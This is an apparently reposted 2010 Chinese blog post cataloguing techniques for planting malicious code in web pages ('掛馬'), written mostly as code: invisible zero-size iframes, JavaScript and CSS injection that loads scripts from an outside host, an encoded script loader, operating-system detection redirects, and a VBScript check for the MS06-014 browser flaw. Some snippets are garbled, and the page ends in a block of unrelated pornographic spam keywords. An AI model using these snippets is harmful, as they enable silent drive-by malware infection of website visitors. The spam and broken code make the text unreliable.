• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉】常用的掛馬方式和系統判斷等代碼

            一:框架掛馬
            <iframe src=地址 width=0 height=0></iframe>

            二:js文件掛馬
            首先將以下代碼
            document.write("<iframe width=0 height=0 src=地址></iframe>");
            保存為xxx.js,
            則JS掛馬代碼為
            <script language=javascript src=xxx.js></script>

            三:js變形加密
            <SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
            muma.txt可改成任意后綴

            四:body掛馬
            <body onload="window.location=地址;"></body>

            五:隱蔽掛馬
            top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src=">;

            六:css中掛馬
            body {
            background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

            七:JAJA掛馬
            <SCRIPT language=javascript>
            window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
            </script>

            八:圖片偽裝
            <html>
            <iframe src="網馬地址" height=0 width=0></iframe>
            <img src="圖片地址"></center>
            </html>

            九:偽裝調用:
            <frameset rows="444,0" cols="*">
            <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
            <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
            </frameset>

            十:高級欺騙
            <a href="
            <SCRIPT Language="JavaScript">
            function www_163_com ()
            {
            var url="網馬地址";
            open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
            }
            </SCRIPT>

            十一:判斷系統代碼

            <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
            <HTML><HEAD><TITLE>404</TITLE>
            <META http-equiv=Content-Type content="text/html; charset=windows-1252">
            <META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
            <BODY>
            <SCRIPT language=javascript>
            window.status="";
            if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
            window.location.href="tk.htm";
            else
            window.location.href="upx06014.htm";
            </SCRIPT>
            </BODY></HTML>

            十二:判斷是否有ms06014代碼

            <script language=VBScript>
            on error resume next
            set server = document.createElement("object")
            server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
            set File = server.createobject(Adodb.Stream,"")
            if Not Err.Number = 0 then
            err.clear
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            else
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            end if
            </script>

            十三:智能讀取js的代碼demo

            //讀娶src的對象
            var v = document.getElementById("advjs");
            //讀娶src的參數
            var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

            document.write("<iframe src="document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
            document.writeln("<HTML><HEAD>");
            document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
            document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
            document.writeln("<BODY> ");
            document.writeln("<DIV style="CURSOR: url(
            document.writeln("style="CURSOR: url(

            //分析src的參數函數
            function getUrlParameterAdv(asName,lsURL){

            loU = lsURL.split("?");
            if (loU.length>1){

            var loallPm = loU[1].split("&");

            for (var i=0; i<loallPm.length; i++){
            var loPm = loallPm[i].split("=");
            if (loPm[0]==asName){
            if (loPm.length>1){
            return loPm[1];
            }else{
            return "";
            }
            }
            }
            }
            return null;
            }

            posted on 2010-05-15 07:49 小默 閱讀(259) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導航

            統計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            日产精品久久久久久久| 91超碰碰碰碰久久久久久综合| 中文字幕亚洲综合久久2| 国产AV影片久久久久久| 久久精品国产亚洲AV不卡| 波多野结衣久久一区二区| 欧美熟妇另类久久久久久不卡| 88久久精品无码一区二区毛片 | 精品久久久久久中文字幕| 99精品久久精品一区二区| 久久人人爽人爽人人爽av| 成人午夜精品无码区久久| 国产产无码乱码精品久久鸭| 久久精品成人| 久久99精品久久久久久久久久 | 精品久久久久久久国产潘金莲| 国产欧美久久久精品影院| 精品国产一区二区三区久久| 久久综合色老色| 99999久久久久久亚洲| 久久久久亚洲AV无码专区桃色 | 国产精品热久久毛片| 蜜臀av性久久久久蜜臀aⅴ麻豆 | 久久国产香蕉一区精品| 久久精品99久久香蕉国产色戒| 久久精品国产精品亜洲毛片| 久久99精品久久久久久| 欧美噜噜久久久XXX| 久久国产色av免费看| 欧美日韩久久中文字幕| 综合久久一区二区三区 | 品成人欧美大片久久国产欧美...| 久久久女人与动物群交毛片| 中文字幕无码精品亚洲资源网久久 | 亚洲人AV永久一区二区三区久久| 久久国产精品免费一区| 久久成人国产精品一区二区| 久久国产视频99电影| 久久久国产一区二区三区| 久久亚洲视频| 亚洲婷婷国产精品电影人久久|